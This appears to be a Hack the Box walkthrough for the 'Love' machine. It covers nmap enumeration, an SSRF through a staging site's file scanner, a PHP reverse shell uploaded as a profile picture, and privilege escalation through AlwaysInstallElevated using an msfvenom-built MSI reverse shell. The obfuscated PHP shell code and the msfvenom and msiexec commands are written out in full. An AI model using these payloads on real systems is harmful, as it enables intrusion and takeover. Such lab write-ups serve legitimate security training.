Welcome to my love-writeup
The love machine can be found here: Hack the Box
Enumeration
Lets start with a full nmap scan against the love machine:
nmap -A -p- -T 4 -oA nmap <ip address>
Try the low hanging fruit – the smb port. Unfortunately there is no anonymous login possible so let’s move on to the web application.
In the ssl cert we can see that the cert is also valid for a subdomain, staging.love.htb. To access the subdomain add staging.love.htb to your hosts file and save it.
After this you can access the internal site from the server.
If you take a closer look you will see the port 5000 is open, but not allowed to be accessed from another network, so we will exploit the scan file function on staging.love.htb with the following URL.
http://localhost:5000 and we can access the internal available site to grab the admin credentials.
![staging.love.htb access internal webserver](https://it-tfuerst.de/wp-content/uploads/2021/05/2021-05-26_18-54.png)
Exploit and Userflag
With the new found credentials visit the the admin site on http://<love-machine ip>/admin. After successful login we have the ability to upload a profile picture! Since this is a Windows Box be careful with the choice of your reverse shell.
![voting-system](https://it-tfuerst.de/wp-content/uploads/2021/05/upload-reverse-shell.png)
Here is the code of a reverse-shell which is working for the love machine.
<?php
header('Content-type: text/plain');
$ip = "10.10.10.10."; //change this
$port = "4444"; //change this
$payload = "7Vh5VFPntj9JDklIQgaZogY5aBSsiExVRNCEWQlCGQQVSQIJGMmAyQlDtRIaQGKMjXUoxZGWentbq1gpCChGgggVFWcoIFhpL7wwVb2ABT33oN6uDm+tt9b966233l7Z39779/32zvedZJ3z7RO1yQjgAAAAUUUQAL>
$evalCode = gzinflate(base64_decode($payload));
$evalArguments = " ".$port." ".$ip;
$tmpdir ="C:\\xampp\\htdocs\\omrs\\images";
chdir($tmpdir);
$res .= "Using dir : ".$tmpdir;
$filename = "D3fa1t_shell.exe";
$file = fopen($filename, 'wb');
fwrite($file, $evalCode);
fclose($file);
$path = $filename;
$cmd = $path.$evalArguments;
$res .= "\n\nExecuting : ".$cmd."\n";
echo $res;
$output = system($cmd);
?>
Lauch a netcat listener to receive the connection. After this you can navigate to the user folder and grab the user-flag.
Privilege Escalation
Privilege Escalation is straight forward on this love-machine. Upload your preferred privilege escalation tool up and look for misconfiguration.
You will notice the following misconfiguration:
![privilege escalation possibility](https://it-tfuerst.de/wp-content/uploads/2021/05/priv-esc-possibiliy.png)
To exploit this create a revers shell for the system with the following command:
msfvenom --platform windows --arch x64 --payload windows/x64/shell_reverse_tcp LHOST=<your ip> LPORT=<your port> --encoder x64/xor --iterations 9 --format msi --out AlwaysInstallElevated.msi
Upload this payload and execute it with the following command after you spanned a netcat listener to receive the connection.
msiexec /quiet /qn /i AlwaysInstallElevated.msi
You should have a elevated shell like in the screenshot.
![msfvenom payload with elevated shell](https://it-tfuerst.de/wp-content/uploads/2021/05/msfvenom-and-nc-authority-system.png)
Root Flag
The reward is the root flag
![root-flag from love-machine](https://it-tfuerst.de/wp-content/uploads/2021/05/root-flag.png)